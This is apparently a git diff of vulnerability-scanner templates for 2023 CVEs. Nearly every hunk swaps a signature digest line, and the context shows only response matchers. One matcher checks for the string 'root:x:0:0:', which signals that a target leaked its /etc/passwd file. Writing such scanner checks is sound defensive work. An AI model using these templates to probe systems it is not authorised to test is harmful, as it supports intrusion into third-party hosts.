490a004630440220416d57fa62310b8cf320e43dd625b5fd4e51d1a6e4331e27f83f3b2fffa6861802204c7f85cedd0e5f5066df465c10ac67e0a8ae3b14f2777c687d48f3c3dd076298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 13ec75afb6..e1f23a4729 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220055c3251afd133401fe850af2d22e93ae59ac1995b1a0f8600ac4a8f40f45ae9022027dd2d5199cd3cb06f4fbaafa058f14e948b13f606b102596b119f0830f08069:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100be3704c9b3f80f5ae04af8cb9e9db2d5084cf50f851623133d400cb030dd6247022100bb73866cc93e92e011449ae95341cde8a713971b9bdca0bd56b5fee0fbcdc5e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index c37170cb69..1b6a9e1e55 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -58,5 +58,4 @@ http: - contains(header_2, "text/html") - status_code_2 == 200 condition: and - -# digest: 4b0a00483046022100f1d5fb873dfeafeeddbc36b95c8ae47501e762bd2beebf3bec3128656efdd770022100c4996b17d1fc50ed6ca4c3793812cbe1c261ef2fc908acc87584c953465b7e5e:922c64590222798bb761d5b6d8e72950 +# digest: 480a0045304302204af97462296d39cd5ff8b5bac7137bd7a78409952056b94220a5e082e24604bc021f398be2b7882ed048f8d2414e0c3923eed62216b14f424484b8287da095e342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 8ecf0f9962..54ef579641 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202ddd6984c3b5cdefd4f555696fa15cf97284e650bfe5cbe33abb4102e1fcbf6802203c84b4a39f033ee1c83ec7af3c79ae855e162e812960a66383c590ad7574f056:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b30c86384e8e80868584dc907b32dd3766fcae270a5ebce5f24043c09e73653f022100f98d2b1f5a546343c39a7ed7bb6c1ece072acfba9158ee014e91187b8601646d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 70215556e1..20d8daa010 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022025072fd6c9d62b2a3a17ea1f6b9d5f118acfc40dac4e08e0b9fcd2f5b4bab8a9022100ff39ceb4f7565e6d0b8958055044d0f1af0235322a59e0f0161710754b8d5aa2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210085ad050c293b141e2950aee2d3641d22855b0f54d03f9bfb9e83ee786a71d9960220774af7e0ef90e2fc900c3c6f026230b85387b3e66310478422ddb291fd70843d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 0b26749b81..38353acabe 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -79,5 +79,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "successfully created")' condition: and - -# digest: 4b0a00483046022100aeca803a5bd5849257e2f228ec4dee3549a76be182525e76d4bfb60e865edb2f022100f8524e4598f6219b953da675f8a3a9a19c3db08e1b047d62e77db0e784a73b3f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022100c252be3b3dfcc24439fb010c15645cb5ffe7cb5254afa58d1938719a4d543982021f20a34f15fd4630f312b29408dce010e882030e40cee130be7274a46c82eb8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 8395a99472..ce405f2664 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dbf166d985d2885fae8821858c18325abbb0e7e49464cd77dee66aaa87a7766f022100c57414d9f79e747a5d99e93253a28d3af705cdbd21ab8e2b3333de44d41f650c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d8671abbb787992f285b4809ea00dfe31add830f4e726d52ebc76e73d4ad06aa02202e8f1ace3c56e2785846695638a1c0ad5ee6ffe83b44e900dde5d9e4e49ee87a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 6907a586ef..9c5f0c70da 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -71,5 +71,4 @@ http: regex: - '(.*)' internal: true - -# digest: 4a0a0047304502206aceaa5352e9b528e28fa4f02d4c0323fb66d7763a6dd7970f654e155e16386502210089fad2ae7588600ab14c431b7531e0da5b99ac5c3d49beffec461aaa1440504d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207ec9a6fb2331a3d8271cc4c02830c55610714e3988ff394e2bebe8a6009d479602201e3d768ed34b4ee6cb16175d7e74cf42f6c228b7a6d65a84ea261ed1af136591:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index e6b96491fb..de22a66bd1 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -42,5 +42,4 @@ http: - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")' - 'contains(body, "")' condition: and - -# digest: 4b0a00483046022100c2fddbe297d2fb2cc65e9122905fe182aa8d9963a6cd247fdd9cc9f7489a8fef022100e9f93e5270c1658a18e98ed474fefa5d63ba47d0e0f4aeacf6f99cfad4b5463f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c0d29b35bea7690a94231b26fa2ed8b41217e30f4fc28b1b5318e616b64da2a30220328d7d728180756b3e17030b76a4378fd8f2c7139a2e89ebaa33031ffae44d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index dd84b3d197..69cc018568 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, "") && contains(body_2, "import_form_template")' - 'status_code_2 == 200' condition: and - -# digest: 490a00463044022050af48a756f4b8369b7fc8981f74ceaa35ea9995d6f1058a7d11acfa9f362dda0220535fe47b3b84231d9665aeaa6e4ea24c6f34214896ffb4eedf80867b8b8f38a0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009a1a9d3479b3d6bd0fc4720d51a79321fdaba579ec1d25a086fcd6193703ec6e02205390cbca54f9dc07671b41292ecc4b3f6289311907a5299bcc840a00fe935267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 2ac3d8aa91..6b693b3754 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -45,5 +45,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and - -# digest: 4a0a00473045022066b6d91de15a7d9bc0c58c5f888df5b4fb6e7b6627d838563f76ed22db22686e0221009b493f4217455ed5ff2c50f48042c36f1a58298497f45711aa9cda5627608b29:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022012a2714e6708deccd3da1118d042a08465ea45cc6816c19ecbd5c798d7f308d002207bc4003a2796baee2e0c4fe61520a56a07107b3d79977edccebb1cab9e7b20a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 5a6f586694..9addcc4628 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -65,5 +65,4 @@ http: part: body_1 regex: - 'ico_res_(\w+)_on\.jsp' - -# digest: 4a0a004730450221008fb08ebb08fdb7e2a1c86e3f5353858c2b1eca47453e03301e0d8144b74be8d8022018b7e48952dc87b77b8f66bcc979ff191bd4ee7ec35a7d3ad207a02a128f6d3c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009a9521f14b8914530ae28a9b4737c7056448879e527b443fb39001f9478d9cb202205b40f7fb24252985e3ded2a198b6ebfeb362017434d6c79ea36e5e5e2642a201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index c5c6953bc8..be33cc1394 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">w71ch") && contains(body, "mooDating")' condition: and - -# digest: 4a0a004730450221008cfde32b7dce1831b4dd71cdd0c0e7208dc35e8ac101dc6f5cafaaa63b5d95f6022000c20051fcc5b0ec39daa44e3ac17e972d7160c65d2385873f857ba797a8cae1:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203d050e7e1ca8acf19d72f1c78bdc12889d531f57de4381e409c01e600f6ff2a902207514008b815c4edd3288b5884e80772dcf7bfbe4f599a852f3baccae2c7a6b14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index 45364c800a..4b6b8b30c2 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022001c8fa4a62b8d41823a7543fe36f35560d797b496179c5716f051946165109ea022100b54804e110c1012b4a38f937a1e49db843f16d2c218342a3d07b018377233c16:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022058ff0ca6c763de47d4053a0522f1e441c48514d702f0a7771f873484a0dc25b80220011e1f8d6d48caaec7aa74eed73f8767a5b945f2a9c4216456739b3bf517357a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index 019299229d..583269aa58 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">r5c3m", "mooDating")' condition: and - -# digest: 4a0a004730450220593bfbf21513a7a2e2aad48aed190f9df45f3c6aeb0e3ee1aed43e72ad24813802210090a6e64d2d72cf2c0aca9c468013a89f76912cc57d892c5eb14f49a5a6084020:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ea8ba2c29b8290050f876a7ba84fe065876cc15c1d24c442bc70704abf705449022022ebea9eca452b19204f8af4187e196e0c15269fd152f5eba944d4a84438d865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index f357d81130..6dd2c82504 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">", "mooDating")' condition: and - -# digest: 4a0a004730450220527474b3ef0d647d76151d07aae2e80095e699ea51246c44ea7b1a79b84bf653022100dc18543295e85fa7eee65f47e1372263d51171e7c45d5cad661af18047fac50f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022041f12ae0d4beae1fd25882f3dba7d4f632f73b9d86a852320eeed6ae2b18255802204fd047d26802c60cf67c28258e682c6a5072f63a92db38de585d7a2971525db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml index 31be4ee4fd..377eaa1fd8 100644 --- a/http/cves/2023/CVE-2023-3846.yaml +++ b/http/cves/2023/CVE-2023-3846.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">", "mooDating")' condition: and - -# digest: 4a0a00473045022100bf9e8fee14e4b8fd8794ab7acfd9887a24c2d4734a397974a46d5f67b30e01c902206049d2afef682aec1709ecc1e6946c06ddaca88a293a75ccd517d7fd86c34a31:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100883bc39a773ed9a69c871c9b8e5d043380e8ee2e3ddd7299d14674e4cbd77e7502206f4e8ce36a6e0adf977a2ae43aae6b247cbcbc5b6a738bf87c4923db0a894dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index e691705daf..b408b0e102 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">","mooDating")' condition: and - -# digest: 4a0a00473045022100c22cb3b367c7fcefec527f524d3f7cbbaa3be42acaec82e9029f6aaad4a5933c022054d59d0f9c3eb4c5a79a7fe1cb8657c8699d4554d8ba361d036439fbbc7f0a4c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fe1b5fb69507a3492e34a12d024441da83d2bd8eb11d4ba7521d306a5c82cd3e02205ef630d55e658d53d3c250012b5763567525a2860ba780732f7e6766a37d46c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index 79d29d7adb..e38243fb55 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooDating")' condition: and - -# digest: 4a0a004730450220012230f097f350a372f9b6f4370275fa3bc497af567cf332d3cd95fbbc717706022100d40d1a37dd3ba0c86e9506661df7f3b5874bdf6c38b31a314b0b16ac47b320cd:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022079e3b929d2067624e88c1a43f97729e279df6810dbe94c30b15c8e0bf024f071022006eb142d8a080523e4c9551ebbf6994ca45315903abdcd230e62de64d3433cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index 926f8296a7..b476918823 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">s9a64") && contains(body, "mooDating")' condition: and - -# digest: 4a0a0047304502204e7fdee2bf4b614bde870f8ac0a48629dc0fc837fd091b8e612b79c11b193b5d022100a753f63734fd830c63a4f10af0134be22503af2fa338bc8933e7bd9bdc9e2d6a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210093c846ff0cae3f348a0d8faf406f6986e1fb0bac3aba227c78797e97681ccf5902202e733479c0aa576b1046ce3827e86a893e78d51eee59fd11b1720b4c4a41fbe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 967b31a690..968a38d29f 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -41,5 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "","\">go to")' condition: and - -# digest: 4b0a004830460221008728e7b7e590f2a059cdb878220ec8da9c690147cb79d1e31852df746df021030221009ab29216f2859ebfcf38ac23ac30f61738d8058f913b91423d44781b197a5656:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b561704c028555abecab27524e43ff23012fcd63dd9ce8eac3319a4203a000e202210094e5a35a835da836671f426d9aaf161a1019bd394217cb8e1f4552b3ba78624d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 8a909bc5c4..9eaa8d47ba 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -70,5 +70,4 @@ http: - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException") - status_code_2 == 400 condition: and - -# digest: 4a0a0047304502210088c3ec8cb48a0d6c3d1ce51f0a643b7ac8edc06b604cd0ee8afeace14523f1b602201f8c3995d86d15651c3c8246e6b70937d6f96fe1bd2dd03fa4a033d4897ec1f9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022037ea4f7024f31e3c504ae093c202ca57ea215c74a55d8a57780ec5c53e21c197022100c2a43832f581d309a5ffb6c531dd6c703c35a94ca2f8a0586afc3b1ca038ebe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 2d70f0f792..20f4d73837 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -42,5 +42,4 @@ http: - "contains(content_type, 'text/plain')" - "status_code == 200" condition: and - -# digest: 4b0a00483046022100dedfa8d997cc453c8722d8129a5e73fc6f063142b0011407e23b8264e3d0fd1e022100d4694191212015932d88a093d4c4bcd96d44f16f45a78cd3c44482e059090853:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100beb4d98446bec09ac076c71b6ca6a620b996fd7c3894e5ff45d003612400d0af02210080346815075ae6181688c2ecefc6ac3b2d38927879fb3a6783000cdafde20b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 6505fa8d50..659cef8853 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -60,5 +60,4 @@ http: part: header_3 status: - 200 - -# digest: 4b0a00483046022100b6e4e5ce4195bfe65d8f71062416fa6a0291f946df6a4300d5f83a6e52b72753022100875303905791aac82042fd32b3198bc959fd6517e322134c64aed17151ad47d0:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203c0dac68d5795e66ba6c24185bdc6258b80834571b3726ecbd09c2c9abf0489102204551a6c3d5ccb602b4d3938facfe06da68abc1cb237b93732ec139996e9cf868:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index c958b36375..0848bbf290 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203160a6a19447455c15c7b796de7ba9098819681dc037dca5b9d00e25795874d3022100e8cd6e357385795efdd22835a6dec145429425daffd9a234a31f892039b81086:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b503f6a8d961d2d0356f5d55f1fe2b6dfe36f3608d13f4d8720a114dd9b405a5022100b7b870c41410ae891622963c2d6d69917b89f699686248717ff77e4345cf3076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 9a6df98345..3899a37663 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -60,5 +60,4 @@ http: part: header_3 status: - 200 - -# digest: 4b0a004830460221008e295a829b9fc3e504e648aa5059d058e3fd6a14e4fd8acd27903b16cf6d15d9022100861e745d9d26fd0275e78555050477b3ed9347446fb2a9be13b6a366b61498d4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205dc11480b7358d09cae56302232b11f789aa2153b9cffe00edbf7ffd930fe17b022002e6c5b4125a99fdcc11dab5ef3fa17f7398ce562d47575459049ab46d7be5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 2cbe246f26..b5c54d528c 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -40,5 +40,4 @@ http: - 'contains(body_1, "Aria2 WebUI")' - 'regex("root:x:0:0:",body_2)' condition: and - -# digest: 4a0a0047304502210097e43115635823b13aa2a846d643d57d1b4310bb7bd9f702b647284c22f722cc022037211ac3aa098bd2206b304447bef23c1533b384f052b8fe0169472ffeec94d2:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220212107ddc9e0291701ceb51a0852f15452d62c1dd1aa4ec270f0c31f16bb79e5022058ea41c5cfa7fef5fad282edaef005c18e4dbefb18f1cd9516be8d2a26cea8c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 9bef415531..492022cf4e 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -41,5 +41,4 @@ http: - contains(to_lower(content_type), "image/png") - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex condition: and - -# digest: 4b0a00483046022100f064e3061ebec92f2d1df9bb17ecfa6d1c3a997fcc9e276e7f0631dbb0e7ccb3022100c847dd46358b02d49885f78a1ebb924ff883996cc25386a0529a3895bd4ce181:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220537e28a58fb56f53b7de0c13e05c4c1bb8623cf9809daf0cfed603983266592c02204aa737ce0b21797d5d0770064ce99a988f8c2ba3b2613dedfda69d651c5781d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 665c4d0520..dcebcc87d9 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e3a0c6d67d5076f2f9b2c966748f89443b7f595b2c55d3b3e5a2e2c419cfd74a0220450dcf0800ea8b1023ae4f5f3c8d6a69da5defca585657b5aea3bf0ba0cf0ce3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022046698a4440fac3ad4832e5c290406fa169382a24ca854171d34d8c77a306fcbf02202b8ca4adb84046bb1d7eb4cdbc623d7713df949946346e020ad16460791af7f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index b3a3d78804..f926290f84 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -41,5 +41,4 @@ http: - 'status_code == 200' - 'contains_all(body, "Tree Mode", "cacti")' condition: and - -# digest: 490a004630440220581f5a70bc181382e53e39c7c7a4fa0c80b81273cf950086e722211409bb691d022005d914b6c8ec8b95be846e8e0660caeeea90c87845ebd8670b6d4cae3fe8b885:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204cbacaa77b229aec24a8a376bd2cd0763f69a2b87d2f75b5cc235275de49a6350221009cf8a4db7d7acdd89f80e046f0a473bcf725dc53271b91d287f978f52dc8ffa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 0059c7d297..ff3c000bff 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206acaaa86d89d05d1e07eb021c2d7cce16812ecb9515d266367ebd6e1602fdf0502201c33f2262706bfddb508822273dcde39d61e22edea7915dc81449332b4f88c4e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206a6c5454b8e5657dc5a554d49ad217dc1a41f91a842c0b0330b1fa5379436f7702210083e032d9f3f4acd05d58510c35bb1920cfb2bef4f0e77afdf69374ca111708e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index e244fa3419..0a27293a95 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100de89159485847f2803eb654020a4c8620e3e5dc6658bec8ba1c7926e2e8b662a022100d773e894e3c525950e8e93881e46da6f46312d0cdf8f44e36b9641f1d13733c3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022072fc41f18434b3b95ede06658a31aa62ca3bdeafb284b16c3fe22ffd49bc91f502203c9baec87a770ccbd2cb72af594a2fafb072ad30d4ca96f2ee74432cfce307f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 15216bc90c..05d561df0c 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022031f97cd8947ae74da712eaa7dfe083e1fb9ef46a2958e72919f02399d77d4d69022100b4a156519465a9d007567a0eee55e0589389b17f1b3630cac3fa859ee3e17e15:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022033a650c222afd27f0a1beac2aebb67f419d5d56d0c78331caff39498c23857cd02204f9a597d5b7b5ae81d4bc3b4a5cf5f1e98f03a9262b9526a8de22beb6be0495e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index c9d922af43..575440b24a 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -52,5 +52,4 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' - -# digest: 4a0a00473045022100cfe52676a4c9401291b7d6d406f8da658346a659fbae19051f08f3684e40d3680220421c31c44a7d3a727c7edf7ea9831601cab871e5d19256f680325d3851e9dcc1:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044021f16d2d03c15b5355b6f4619295355f1a7cdc28a3e384ca4840b1dfaa3de4bba0221009f976861161a6d2cc560e31d4ea1174f8d3d554737c13d7e6e2b31cee99fa198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index db392b6b02..815a4ba526 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -39,5 +39,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, ">") && contains(body, "IceWarp")' condition: and - -# digest: 4a0a00473045022100ae7c0adbc795a3e839c6dda65bd0e843903d72801e46342ab7a49347e4ab0bd702207bf6f9e3fb4010f8e22df88d575cade915058cd9fe2eef8462bdca06241a7846:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022022d7312f3feea5868bc9e8cf8709e9defec9116a87c4636b4e37b54b7aa3ca5d0220327586cdf2027a73d6f668955caea2b29ac6509afe7db2ee465ae486b222beae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 853b62306f..7e18303aa0 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022009d1f71162b4634fbc656bebafdc3e4c038e84df584b72f008718ff713e37f37022100d46dc6ff1efa55b6a8a3c5457be3818cbf510e1ec1c88d2b59591dfd08850c0f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220565085eb04882d398919fbc28aed19e4b920ea0804bc65860d368af492fe8809022100d2b24dcda7044d2bbfacd8a23138cfa7c851c7fb740391c9c76523e9180992b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index 2f38e34d7e..5cd87db3ac 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 302 - -# digest: 4a0a0047304502210097300a3c3f2410809c912f2c54045aa1904814f5f02a57782a376d1c59dedba202202dcbd3ce76242e93648e8569f6115368bc6e42ce986890153892ffaf49d82abc:922c64590222798bb761d5b6d8e72950 +# digest: 